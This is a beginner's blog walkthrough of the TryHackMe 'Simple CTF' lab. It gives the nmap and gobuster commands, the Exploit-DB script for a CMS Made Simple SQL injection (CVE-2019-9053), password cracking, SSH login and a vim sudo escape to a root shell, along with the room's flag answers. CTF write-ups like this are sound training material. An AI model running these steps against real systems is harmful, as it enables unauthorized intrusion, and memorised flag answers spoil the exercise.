Jasper Alblas
TryHackMe: Simple CTF – Walkthrough
Hi! It is time to have a thorough look at the Simple CTF room on TryHackMe. This room covers a lot of fundamental skills and techniques often used in pentesting assignments, and therefore I recommend it as a great CTF for a beginner.
Room URL: https://tryhackme.com/room/easyctf
I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Task 1 (Simple CTF)
Deploy the machine and attempt the questions!
When you visit the IP address we get to the following page:
It looks like a default Ubuntu installation. Hmm.. Let’s get to the questions!
Questions
How many services are running under port 1000?
To answer this question we can use NMap to find out more.
nmap -sS -Pn -T4 -p- <TARGET IP>
With the following flags:
- –sS being a stealth scan (which avoid the 3 part handshake to avoid detection, which is great for a quick port scan).
- –Pn disables ping and only scans for open ports, again to avoid detection.
- –T4 slightly quickens the scan, although it is a bit more agressive
- –p– means scanning all ports.
Answer: 2
What is running on the higher port?
Now we know about port 21, 80 and 2222 we can get more info on them by using the -A flag:
nmap -A -Pn -T4 -p21,80,2222 <TARGET_IP>
There are quite a few interesting facts here. We can see a FTP with anonymous login, a robots.txt file with disallowed entries, and relevant to this question, SSH access.
Answer: ssh
What’s the CVE you’re using against the application?
We need to enumerate a bit more. Let’s use gobuster to find out about files and directories on the server:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u <TARGET IP>
A lot of interesting discoveries here. The one that stands out is the /simple page:
It shows a webpage running on CMS made simple. In the bottom we can find a version number:
Let’s see if we can find exploits by using:
searchsploit cms made simple 2.2.8
More info can be found here:
This is the right exploit!
Answer: CVE-2019–9053
To what kind of vulnerability is the application vulnerable?
This is a SQL injection vulnerability, in short: SQLi.
Answer: SQLi
What’s the password?
Let’s download the script by using wget:
wget
https://www.exploit-db.com/download/46635
Then we can run this python by writing:
python2 exploit.py -u <url>
Some notes:
- We need to have use python2, as the print statements for example using python 2 syntax.
- If you do not have the requests module installed run the following command: python2 -m pip install requests
- The same goes for a module called termcolor
After these changes we should be able to run the previous command. However, since we are interested in the password we need to use the -c flag together with the -w flag (for wordlist).
python2 exploit.py -u <url> -c -w /usr/share/wordlists/rockyou.txt
We find the following password:
Answer: secret
Where can you login with the details obtained?
Well, we have a SSH so let’s try logging in 🙂
We are logged in. Note: it is important to add the -p flag with the port 2222. Otherwise the terminal just freezes.
Answer: ssh
What’s the user flag?
A simple ls, followed by cat user.txt gives us the anwer:
Answer: G00d j0b, keep up!
Is there any other user in the home directory? What’s its name?
We are in the mitch home directory, so let’s go one directory up (/home) and list the folders.
Answer: sunbath
What can you leverage to spawn a privileged shell?
Let’s list the commands that we are allowed to run as sudo for the current user.
We can run a vim shell with privileges.
Answer: vim
What’s the root flag?
Let’s look at our friend GTFOBins:
https://gtfobins.github.io/gtfobins/vim
Here we can read on how to exploit this sudo right to break out from restricted environments by spawning an interactive system shell.
We do this like this:
sudo vim -c ‘:!/bin/sh’
This gives us a root shell:
Answer: W3ll d0n3. You made it!
We are done!
Bonus tidbit:
There is a little bit of an easter egg on the FTP server. You can connect to it with ftp@<ip>. Then you write Anonymous. You can find a txt file on the ftp server, which you can read with get ForMitch.txt
This would have given us some extra info on both usernames and password 🙂
Anyway, thanks for reading! That’s Simple CTF over with!
Like my articles?
You are welcome to comment on this article, or share it friends.
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:
